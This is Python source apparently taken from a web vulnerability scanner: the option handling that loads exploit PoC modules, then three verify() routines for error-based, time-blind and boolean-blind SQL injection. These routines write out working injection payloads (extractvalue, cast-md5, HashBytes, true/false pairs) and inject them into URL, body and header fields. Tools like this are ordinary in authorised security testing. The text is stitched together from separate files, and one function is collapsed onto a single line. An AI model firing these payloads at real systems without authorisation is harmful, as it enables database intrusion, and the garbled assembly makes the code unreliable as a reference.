    # TODO: needs validation / error handling / socks proxy support
    if cmd_line_options.proxy:
        host_port = cmd_line_options.proxy
        cmd_line_options.proxy = {"http": "http://{}".format(host_port),
                                  "https": "https://{}".format(host_port),
                                  }
    else:
        cmd_line_options.proxy = {}
    # verbosity 0..3 maps to DEBUG..CRITICAL
    if cmd_line_options.verbose == 0:
        logger.logger.setLevel(logging.DEBUG)
    elif cmd_line_options.verbose == 1:
        logger.logger.setLevel(logging.INFO)
    elif cmd_line_options.verbose == 2:
        logger.logger.setLevel(logging.WARNING)
    elif cmd_line_options.verbose == 3:
        logger.logger.setLevel(logging.CRITICAL)
    # validate DNS servers and stash them in the globals (es mode only)
    if db_set.get("es_open"):
        servers = find_dns_server().find_dnsservers()
        logger.info("Found dns_servers:{}".format(servers))
        if servers == []:
            logger.warning("Not Found dns_servers, Check your Networks or edit data/common/dns_servers.txt")
            sys.exit()
        others.dns_servers = servers
    # html-output handling
    logger.info("Vuln results will output to: {}".format(cmd_line_options.html_output))
    cmd_line_options.allow_poc = []
    cmd_line_options.allow_plugin = {}
    cmd_line_options.pocs_perfile = []
    cmd_line_options.pocs_perfoler = []
    cmd_line_options.pocs_perscheme = []
    cmd_line_options.pocs_perserver = []
    cmd_line_options.pocs_load_moudle = {
        "perfile": {},
        "perfolder": {},
        "perscheme": {},
        "perserver": {}
    }
    # poc_keys aliases the per-category lists filled below
    poc_keys = {
        "perfile": cmd_line_options.pocs_perfile,
        "perfolder": cmd_line_options.pocs_perfoler,
        "perscheme": cmd_line_options.pocs_perscheme,
        "perserver": cmd_line_options.pocs_perserver
    }
    # which poc folders apply depends on the subcommand
    if cmd_line_options.command == "webscan":
        cmd_line_options.poc_folders = ["perfile", "perfolder", "perscheme"]
    if cmd_line_options.command == "hostscan":
        cmd_line_options.poc_folders = ["perserver"]
    if "all" not in cmd_line_options.disable:
        # --disable wins over --enable: walk each folder recursively and
        # keep every .py poc NOT matched by a disable substring
        if cmd_line_options.disable:
            cmd_line_options.enable = None
            for _dir in cmd_line_options.poc_folders:
                # (old flat-listdir selection was commented out here and
                # has been dropped for clarity)
                for root, dirs, files in os.walk(os.path.join(paths.MYSCAN_POCS_PATH, _dir)):
                    for file in files:
                        if file.endswith(".py") and not file.startswith("__"):
                            if not any([disable in file for disable in cmd_line_options.disable]):
                                poc_keys.get(_dir).append(os.path.abspath(os.path.join(root, file)))
        else:
            # --enable (or no filter at all): keep matching .py pocs
            for _dir in cmd_line_options.poc_folders:
                for root, dirs, files in os.walk(os.path.join(paths.MYSCAN_POCS_PATH, _dir)):
                    for file in files:
                        if file.endswith(".py") and not file.startswith("__"):
                            if not cmd_line_options.enable:
                                poc_keys.get(_dir).append(os.path.abspath(os.path.join(root, file)))
                            else:
                                if any([enable in file for enable in cmd_line_options.enable]):
                                    poc_keys.get(_dir).append(os.path.abspath(os.path.join(root, file)))
        # import every selected poc file, keyed by hash of its path
        for _dir in cmd_line_options.poc_folders:
            logger.debug("{} total: {} pocs".format(_dir.capitalize(),
                                                    len(list(set(poc_keys.get(_dir))))))
            for poc in list(set(poc_keys.get(_dir))):
                logger.info("Load Pocs:{}".format(poc))
                cmd_line_options.pocs_load_moudle[_dir][hash(poc)] = {
                    "poc": poc,
                    "class": load_file_to_module(poc)
                }
        if cmd_line_options.command == "webscan":
            if not (cmd_line_options.pocs_perfile or cmd_line_options.pocs_perfoler or
                    cmd_line_options.pocs_perscheme):
                logger.warning("No Pocs ,please use --enable un_auth sqli")
                sys.exit()
        if cmd_line_options.command == "hostscan":
            if not cmd_line_options.pocs_perserver:
                logger.warning("No Pocs ,please use --enable brute ms17010")
                sys.exit()
    else:
        logger.warning("No Pocs Load!")
    # language-plugin option handling: enable plugins whose filename
    # matches a requested substring, keyed by hash of their path
    plugins_dir = os.path.join(paths.MYSCAN_PLUGINS_PATH, cmd_line_options.command)
    exists_poc_with_ext = list(
        filter(lambda x: not x.startswith("__"), os.listdir(plugins_dir)))
    if cmd_line_options.plugins:
        for openplugin in list(set(cmd_line_options.plugins)):
            for plugin in exists_poc_with_ext:
                if openplugin in plugin:
                    plugin_path = os.path.join(plugins_dir, plugin)
                    logger.info("Load Plugin:{}".format(plugin_path))
                    cmd_line_options.allow_plugin[hash(plugin_path)] = {
                        "poc": plugin_path,
                        "class": load_file_to_module(plugin_path)
                    }
    if len(cmd_line_options.allow_plugin) == 0:
        logger.warning("No Plugins Load!")
    # abort when neither pocs nor plugins were loaded
    total_poc = 0
    for x in cmd_line_options.pocs_load_moudle.values():
        total_poc += len(x)
    others.total_pocs = total_poc
    if total_poc == 0 and len(cmd_line_options.allow_plugin) == 0:
        logger.warning("No Plugins Pocs Load! Check your arguments ,Program will exit")
        sys.exit()
    # set up the ssti globals
    importssti()
    # register pocs that need the url-path dictionaries
    poc1 = os.path.join(paths.MYSCAN_POCS_PATH, "perfolder", "info", "myscan_dirscan.py")
    if poc1 in cmd_line_options.pocs_perfoler:
        get_dict()
    # runtime patches
    # patch_banner_timeout()  # seems to have no effect
    ipv6_patch()
    # set up the elasticsearch connection
    set_es_conn()
    # configure dishost / host filtering
    if cmd_line_options.host:
        cmd_line_options.dishost = []
def verify(self):
    """Probe every URL/body parameter and selected HTTP headers for
    error-based SQL injection.

    Builds DB-specific error payloads (MySQL ``extractvalue``,
    PostgreSQL ``cast``, MSSQL ``convert``/``HashBytes``) tagged with
    the md5 of a random marker, then fans the mutated requests out to
    ``self.args_inject`` / ``self.header_inject`` worker threads, which
    search the responses for the marker hash.

    Payload tuple layout: ``(payload, search_str, method)`` where
    method "a" appends the payload to the original value and "w"
    replaces the value wholesale.
    """
    # Skip static resources (images, css, ...) — not injectable.
    if self.dictdata.get("url").get("extension").lower() in notAcceptedExt:
        return
    # Parser used to rebuild requests with a mutated parameter/header.
    self.parser = dictdata_parser(self.dictdata)
    # Blacklist: tomcat sample/doc paths are known noise.
    if self.dictdata.get("url").get("path").startswith(
            "/examples/") or self.dictdata.get("url").get(
                "path").startswith("/docs/"):
        return
    # URL/body parameter injection.
    random_num = get_random_num(8)
    random_num_md5 = getmd5(random_num)
    # NOTE(fix): the original list carried the two extractvalue payloads
    # twice; duplicates removed so each probe is sent only once.
    payloads = [
        ('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format(
            random_num), random_num_md5, "a"),
        ("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format(
            random_num), random_num_md5, "a"),
        ("'and(select'1'from/**/cast(md5({})as/**/int))>'0".format(
            random_num), random_num_md5, "a"),
        ('"and(select\'1\'from/**/cast(md5({})as/**/int))>"0'.format(
            random_num), random_num_md5, "a"),
        ("'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))>'0"
         .format(random_num), random_num_md5, "a"),
        ('"and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'{}\')))>"0'
         .format(random_num), random_num_md5, "a"),
        ("/**/and/**/cast(md5('{}')as/**/int)>0".format(random_num),
         random_num_md5, "a"),
        ("convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))".
         format(random_num), random_num_md5, "w"),
        ("extractvalue(1,concat(char(126),md5({})))".format(random_num),
         random_num_md5, "w")
    ]
    params = self.dictdata.get("request").get("params").get("params_url") + \
        self.dictdata.get("request").get("params").get("params_body")
    reqs = []
    if params:
        for param in params:
            # Lead with a syntax-breaking probe, then the tagged payloads.
            for payload, search_str, method in [('鎈\'"\(', None, "a")
                                                ] + payloads:
                req = self.parser.getreqfromparam(param, method, payload)
                reqs.append(
                    (req, payload, search_str, random_num_md5, param))
        mythread(self.args_inject, reqs, cmd_line_options.threads)
    # Header injection — optional, gated by plugin configuration.
    if not plugin_set.get("sqli").get("header_inject"):
        return
    header_msg = {
        "User-Agent": {
            "msg": "sqli_error_ua",
            "default":
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36"
        },
        "Referer": {
            "msg": "sqli_error_referer",
            "default": "https://www.qq.com/search"
        },
        "X-Forwarded-For": {
            "msg": "sqli_error_xff",
            "default": "12.40.9.144"
        },
        "Real-Ip": {
            "msg": "sqli_error_ri",
            "default": "2.40.9.144"
        },
        "X-Forwarded-Host": {
            "msg": "sqli_error_xfh",
            "default": "2.40.9.144"
        },
    }
    reqs = []
    for k, v in header_msg.items():
        if self.output(v.get("msg")):
            logger.debug("start {} inject ".format(k))
            headers = copy.deepcopy(
                self.dictdata.get("request").get("headers"))
            # Inject a benign default when the request lacked the header.
            if k not in headers.keys():
                headers[k] = v.get("default")
            for payload, search_str, method in [('\'"\(', None, "a")
                                                ] + payloads:
                headers_withpayload = copy.deepcopy(headers)
                headers_withpayload[k] = headers_withpayload[
                    k] + payload if method == "a" else payload
                req = self.parser.generaterequest(
                    {"headers": headers_withpayload})
                reqs.append((req, (payload, search_str, k, v.get("msg"))))
    mythread(self.header_inject, reqs, cmd_line_options.threads)
def verify(self): if self.dictdata.get("url").get("extension").lower() in notAcceptedExt: return self.parser = dictdata_parser(self.dictdata) # args inject params = self.dictdata.get("request").get("params").get("params_url") + \ self.dictdata.get("request").get("params").get("params_body") if params: for param in params: self.param = param self.injectstatus = False payloads = copy.deepcopy(self.payloads_alpha) + copy.deepcopy( self.payloads_digit) mythread(self.args_inject, payloads, cmd_line_options.threads) # header inject if not plugin_set.get("sqli").get("header_inject"): return header_msg = { "User-Agent": { "msg": "sqli_timeblind_ua", "default": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36" }, "Referer": { "msg": "sqli_timeblind_referer", "default": "https://www.qq.com/search" }, "X-Forwarded-For": { "msg": "sqli_timeblind_xff", "default": "12.40.9.144" }, "Real-Ip": { "msg": "sqli_timeblind_ri", "default": "2.40.9.144" }, "X-Forwarded-Host": { "msg": "sqli_timeblind_xfh", "default": "2.40.9.144" }, } reqs = [] payloads = copy.deepcopy(self.payloads_alpha) for k, v in header_msg.items(): if self.output(v.get("msg")): logger.debug("start timeblind {} inject ".format(k)) headers = copy.deepcopy( self.dictdata.get("request").get("headers")) if k not in headers.keys(): headers[k] = v.get("default") for test_payload in payloads: reqs.append((headers, k, v, test_payload)) # for test in payloads: # headers_withpayload = copy.deepcopy(headers) # reqs.append() # headers_withpayload[k] = headers_withpayload[k] + payload if method == "a" else payload # req =self.parser.generaterequest({"headers": headers_withpayload}) # reqs.append((req, (payload, search_str, k, v.get("msg")))) mythread(self.headers_inject, reqs, cmd_line_options.threads)
def verify(self):
    """Probe URL/body parameters and selected HTTP headers for
    boolean-based blind SQL injection.

    The original request is replayed once so dynamic page fragments
    can be detected (``findDynamicContent``) and stripped before the
    true/false response comparison performed by ``self.inject`` /
    ``self.inject_headers``.
    """
    # Skip static resources (images, css, ...) — not injectable.
    if self.dictdata.get("url").get("extension").lower() in notAcceptedExt:
        return
    self.parser = dictdata_parser(self.dictdata)
    # Replay the raw request to learn which fragments change between
    # identical requests; those are ignored during comparison.
    self.dynamic = []
    r = request(**self.parser.getrawrequest())
    if r is not None:  # fix: identity check instead of `!= None`
        ret = findDynamicContent(
            self.parser.getresponsebody().decode(errors="ignore"), r.text)
        if ret:
            self.dynamic.extend(ret)
        if self.dictdata.get("response").get("mime_stated") == "HTML":
            self.text = getFilteredPageContent(
                removeDynamicContent(r.text, self.dynamic))
        else:
            self.text = removeDynamicContent(r.text, self.dynamic)
    else:
        return
    # True/false pair templates: {0}=={1} is the "true" form.
    sql_flag = [
        "' and '{0}'='{1}",
        '" and "{0}"="{1}',
    ]
    # URL and body parameters.
    params = self.dictdata.get("request").get("params").get("params_url") + \
        self.dictdata.get("request").get("params").get("params_body")
    if params:
        for param in params:
            success = False
            payloads = copy.deepcopy(sql_flag)
            # ORDER BY-style values get an extra conditional template.
            if param.get("value") in ["desc", "asc"]:
                payloads += [
                    ",if('{0}'='{1}',1,(select 1 from information_schema.tables))"
                ]
            for payload in payloads:
                random_str = get_random_str(2).lower()
                payload_right = payload.format(random_str + "a",
                                               random_str + "a")
                payload_false = payload.format(random_str + "b",
                                               random_str + "c")
                req_true = self.parser.getreqfromparam(
                    param, "a", payload_right)
                req_false = self.parser.getreqfromparam(
                    param, "a", payload_false)
                if self.inject(req_false, req_true, payload_right,
                               payload_false, param.get("name")):
                    success = True
                    break
            # Numeric parameters: arithmetic-equivalence probes.
            if not success and str(param.get("value")).isdigit():
                # fix: coerce to str — the guard above accepts int values,
                # and the concatenations below require a string.
                param_value = str(param.get("value"))
                random_num = random.randint(2, 8)
                payloads_num = [
                    ("/0", "*1"),
                    ("/**/and+{0}={1}".format(random_num, random_num + 1),
                     "/**/and+{0}={1}".format(random_num, random_num)),
                ]
                for payload_false, payload_right in payloads_num:
                    req_true = self.parser.getreqfromparam(
                        param, "a", payload_right)
                    req_false = self.parser.getreqfromparam(
                        param, "a", payload_false)
                    if self.inject(req_false, req_true,
                                   param_value + payload_right,
                                   param_value + payload_false,
                                   param.get("name")):
                        break
    # Header injection — optional, gated by plugin configuration.
    if not plugin_set.get("sqli").get("header_inject"):
        return
    header_msg = {
        "User-Agent": {
            "msg": "sqli_boolen_ua",
            "default":
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36"
        },
        "Referer": {
            "msg": "sqli_boolen_referer",
            "default": "https://www.qq.com/search"
        },
        "X-Forwarded-For": {
            "msg": "sqli_boolen_xff",
            "default": "12.40.9.144"
        },
        "Real-Ip": {
            "msg": "sqli_boolen_ri",
            "default": "2.40.9.144"
        },
        "X-Forwarded-Host": {
            "msg": "sqli_boolen_xfh",
            "default": "2.40.9.144"
        },
    }
    reqs = []
    for k, v in header_msg.items():
        if self.output(v.get("msg")):
            logger.debug("start {} inject ".format(k))
            headers = copy.deepcopy(
                self.dictdata.get("request").get("headers"))
            # Inject a benign default when the request lacked the header.
            if k not in headers.keys():
                headers[k] = v.get("default")
            reqs.append((headers, k, v))
    mythread(self.inject_headers, reqs, cmd_line_options.threads)